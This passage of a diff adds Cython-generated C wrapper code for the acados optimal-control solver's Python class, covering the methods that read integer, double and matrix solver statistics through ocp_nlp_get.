return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_24__get_stat_int(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_field); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_24__get_stat_int(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_field) { + int __pyx_v_out; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + char const *__pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("_AcadosOcpSolverCython__get_stat_int", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":430 + * def __get_stat_int(self, field): + * cdef int out + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &out) # <<<<<<<<<<<<<< + * return out + * + */ + __pyx_t_1 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_1) && PyErr_Occurred())) __PYX_ERR(0, 430, __pyx_L1_error) + ocp_nlp_get(__pyx_v_self->nlp_config, __pyx_v_self->nlp_solver, __pyx_t_1, ((void *)(&__pyx_v_out))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":431 + * cdef int out + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &out) + * return out # <<<<<<<<<<<<<< + * + * def __get_stat_double(self, field): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PyInt_From_int(__pyx_v_out); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 431, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":428 + * + * + * def __get_stat_int(self, field): # <<<<<<<<<<<<<< + * cdef int out + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &out) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython._AcadosOcpSolverCython__get_stat_int", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":433 + * return out + * + * def __get_stat_double(self, field): # <<<<<<<<<<<<<< + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((1,)) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out.data) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_27_AcadosOcpSolverCython__get_stat_double(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_27_AcadosOcpSolverCython__get_stat_double = {"_AcadosOcpSolverCython__get_stat_double", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_27_AcadosOcpSolverCython__get_stat_double, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_27_AcadosOcpSolverCython__get_stat_double(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_field = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("_AcadosOcpSolverCython__get_stat_double (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_field,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_field)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 433, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_AcadosOcpSolverCython__get_stat_double") < 0)) __PYX_ERR(0, 433, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_field = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("_AcadosOcpSolverCython__get_stat_double", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 433, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython._AcadosOcpSolverCython__get_stat_double", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_26__get_stat_double(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_field); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_26__get_stat_double(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_field) { + PyArrayObject *__pyx_v_out = 0; + __Pyx_LocalBuf_ND __pyx_pybuffernd_out; + __Pyx_Buffer __pyx_pybuffer_out; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + PyArrayObject *__pyx_t_5 = NULL; + char const *__pyx_t_6; + char *__pyx_t_7; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("_AcadosOcpSolverCython__get_stat_double", 0); + __pyx_pybuffer_out.pybuffer.buf = NULL; + __pyx_pybuffer_out.refcount = 0; + __pyx_pybuffernd_out.data = NULL; + __pyx_pybuffernd_out.rcbuffer = &__pyx_pybuffer_out; + + /* "acados_template/acados_ocp_solver_pyx.pyx":434 + * + * def __get_stat_double(self, field): + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((1,)) # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out.data) + * return out + */ + __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_np); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 434, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_zeros); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 434, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_2)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_2); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_2, __pyx_tuple__23}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 434, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + if (!(likely(((__pyx_t_1) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_1, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 434, __pyx_L1_error) + __pyx_t_5 = ((PyArrayObject *)__pyx_t_1); + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_out.rcbuffer->pybuffer, (PyObject*)__pyx_t_5, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_STRIDES, 1, 0, __pyx_stack) == -1)) { + __pyx_v_out = ((PyArrayObject *)Py_None); __Pyx_INCREF(Py_None); __pyx_pybuffernd_out.rcbuffer->pybuffer.buf = NULL; + __PYX_ERR(0, 434, __pyx_L1_error) + } else {__pyx_pybuffernd_out.diminfo[0].strides = __pyx_pybuffernd_out.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_out.diminfo[0].shape = __pyx_pybuffernd_out.rcbuffer->pybuffer.shape[0]; + } + } + __pyx_t_5 = 0; + __pyx_v_out = ((PyArrayObject *)__pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":435 + * def __get_stat_double(self, field): + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((1,)) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out.data) # <<<<<<<<<<<<<< + * return out + * + */ + __pyx_t_6 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_6) && PyErr_Occurred())) __PYX_ERR(0, 435, __pyx_L1_error) + __pyx_t_7 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_out)); if (unlikely(__pyx_t_7 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 435, __pyx_L1_error) + ocp_nlp_get(__pyx_v_self->nlp_config, __pyx_v_self->nlp_solver, __pyx_t_6, ((void *)__pyx_t_7)); + + /* "acados_template/acados_ocp_solver_pyx.pyx":436 + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((1,)) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out.data) + * return out # <<<<<<<<<<<<<< + * + * def __get_stat_matrix(self, field, n, m): + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_out); + __pyx_r = ((PyObject *)__pyx_v_out); + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":433 + * return out + * + * def __get_stat_double(self, field): # <<<<<<<<<<<<<< + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((1,)) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out.data) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + { PyObject *__pyx_type, *__pyx_value, *__pyx_tb; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&__pyx_type, &__pyx_value, &__pyx_tb); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_out.rcbuffer->pybuffer); + __Pyx_ErrRestore(__pyx_type, __pyx_value, __pyx_tb);} + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython._AcadosOcpSolverCython__get_stat_double", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + goto __pyx_L2; + __pyx_L0:; + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_out.rcbuffer->pybuffer); + __pyx_L2:; + __Pyx_XDECREF((PyObject *)__pyx_v_out); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":438 + * return out + * + * def __get_stat_matrix(self, field, n, m): # <<<<<<<<<<<<<< + * cdef cnp.ndarray[cnp.float64_t, ndim=2] out_mat = np.ascontiguousarray(np.zeros((n, m)), dtype=np.float64) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out_mat.data) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_29_AcadosOcpSolverCython__get_stat_matrix(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_29_AcadosOcpSolverCython__get_stat_matrix = {"_AcadosOcpSolverCython__get_stat_matrix", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_29_AcadosOcpSolverCython__get_stat_matrix, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_29_AcadosOcpSolverCython__get_stat_matrix(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_field = 0; + PyObject *__pyx_v_n = 0; + PyObject *__pyx_v_m = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("_AcadosOcpSolverCython__get_stat_matrix (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_field,&__pyx_n_s_n,&__pyx_n_s_m,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_field)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 438, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_n)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 438, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("_AcadosOcpSolverCython__get_stat_matrix", 1, 3, 3, 1); __PYX_ERR(0, 438, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_m)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 438, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("_AcadosOcpSolverCython__get_stat_matrix", 1, 3, 3, 2); __PYX_ERR(0, 438, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_AcadosOcpSolverCython__get_stat_matrix") < 0)) __PYX_ERR(0, 438, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + } + __pyx_v_field = values[0]; + __pyx_v_n = values[1]; + __pyx_v_m = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("_AcadosOcpSolverCython__get_stat_matrix", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 438, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython._AcadosOcpSolverCython__get_stat_matrix", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_28__get_stat_matrix(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_field, __pyx_v_n, __pyx_v_m); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_28__get_stat_matrix(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_field, PyObject *__pyx_v_n, PyObject *__pyx_v_m) { + PyArrayObject *__pyx_v_out_mat = 0; + __Pyx_LocalBuf_ND __pyx_pybuffernd_out_mat; + __Pyx_Buffer __pyx_pybuffer_out_mat; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + int __pyx_t_6; + PyArrayObject *__pyx_t_7 = NULL; + char const *__pyx_t_8; + char *__pyx_t_9; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("_AcadosOcpSolverCython__get_stat_matrix", 0); + __pyx_pybuffer_out_mat.pybuffer.buf = NULL; + __pyx_pybuffer_out_mat.refcount = 0; + __pyx_pybuffernd_out_mat.data = NULL; + __pyx_pybuffernd_out_mat.rcbuffer = &__pyx_pybuffer_out_mat; + + /* "acados_template/acados_ocp_solver_pyx.pyx":439 + * + * def __get_stat_matrix(self, field, n, m): + * cdef cnp.ndarray[cnp.float64_t, ndim=2] out_mat = np.ascontiguousarray(np.zeros((n, m)), dtype=np.float64) # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out_mat.data) + * return out_mat + */ + __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_np); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_ascontiguousarray); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_np); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_zeros); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_v_n); + __Pyx_GIVEREF(__pyx_v_n); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_n); + __Pyx_INCREF(__pyx_v_m); + __Pyx_GIVEREF(__pyx_v_m); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_v_m); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_4))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_4); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_4, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_5, __pyx_t_3}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_6, 1+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + __pyx_t_4 = PyTuple_New(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_t_1); + __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_np); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_float64); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (PyDict_SetItem(__pyx_t_1, __pyx_n_s_dtype, __pyx_t_5) < 0) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_2, __pyx_t_4, __pyx_t_1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (!(likely(((__pyx_t_5) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_5, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 439, __pyx_L1_error) + __pyx_t_7 = ((PyArrayObject *)__pyx_t_5); + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_out_mat.rcbuffer->pybuffer, (PyObject*)__pyx_t_7, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_STRIDES, 2, 0, __pyx_stack) == -1)) { + __pyx_v_out_mat = ((PyArrayObject *)Py_None); __Pyx_INCREF(Py_None); __pyx_pybuffernd_out_mat.rcbuffer->pybuffer.buf = NULL; + __PYX_ERR(0, 439, __pyx_L1_error) + } else {__pyx_pybuffernd_out_mat.diminfo[0].strides = __pyx_pybuffernd_out_mat.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_out_mat.diminfo[0].shape = __pyx_pybuffernd_out_mat.rcbuffer->pybuffer.shape[0]; __pyx_pybuffernd_out_mat.diminfo[1].strides = __pyx_pybuffernd_out_mat.rcbuffer->pybuffer.strides[1]; __pyx_pybuffernd_out_mat.diminfo[1].shape = __pyx_pybuffernd_out_mat.rcbuffer->pybuffer.shape[1]; + } + } + __pyx_t_7 = 0; + __pyx_v_out_mat = ((PyArrayObject *)__pyx_t_5); + __pyx_t_5 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":440 + * def __get_stat_matrix(self, field, n, m): + * cdef cnp.ndarray[cnp.float64_t, ndim=2] out_mat = np.ascontiguousarray(np.zeros((n, m)), dtype=np.float64) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out_mat.data) # <<<<<<<<<<<<<< + * return out_mat + * + */ + __pyx_t_8 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_8) && PyErr_Occurred())) __PYX_ERR(0, 440, __pyx_L1_error) + __pyx_t_9 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_out_mat)); if (unlikely(__pyx_t_9 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 440, __pyx_L1_error) + ocp_nlp_get(__pyx_v_self->nlp_config, __pyx_v_self->nlp_solver, __pyx_t_8, ((void *)__pyx_t_9)); + + /* "acados_template/acados_ocp_solver_pyx.pyx":441 + * cdef cnp.ndarray[cnp.float64_t, ndim=2] out_mat = np.ascontiguousarray(np.zeros((n, m)), dtype=np.float64) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out_mat.data) + * return out_mat # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_out_mat); + __pyx_r = ((PyObject *)__pyx_v_out_mat); + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":438 + * return out + * + * def __get_stat_matrix(self, field, n, m): # <<<<<<<<<<<<<< + * cdef cnp.ndarray[cnp.float64_t, ndim=2] out_mat = np.ascontiguousarray(np.zeros((n, m)), dtype=np.float64) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out_mat.data) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + { PyObject *__pyx_type, *__pyx_value, *__pyx_tb; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&__pyx_type, &__pyx_value, &__pyx_tb); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_out_mat.rcbuffer->pybuffer); + __Pyx_ErrRestore(__pyx_type, __pyx_value, __pyx_tb);} + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython._AcadosOcpSolverCython__get_stat_matrix", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + goto __pyx_L2; + __pyx_L0:; + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_out_mat.rcbuffer->pybuffer); + __pyx_L2:; + __Pyx_XDECREF((PyObject *)__pyx_v_out_mat); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":444 + * + * + * def get_cost(self): # <<<<<<<<<<<<<< + * """ + * Returns the cost value 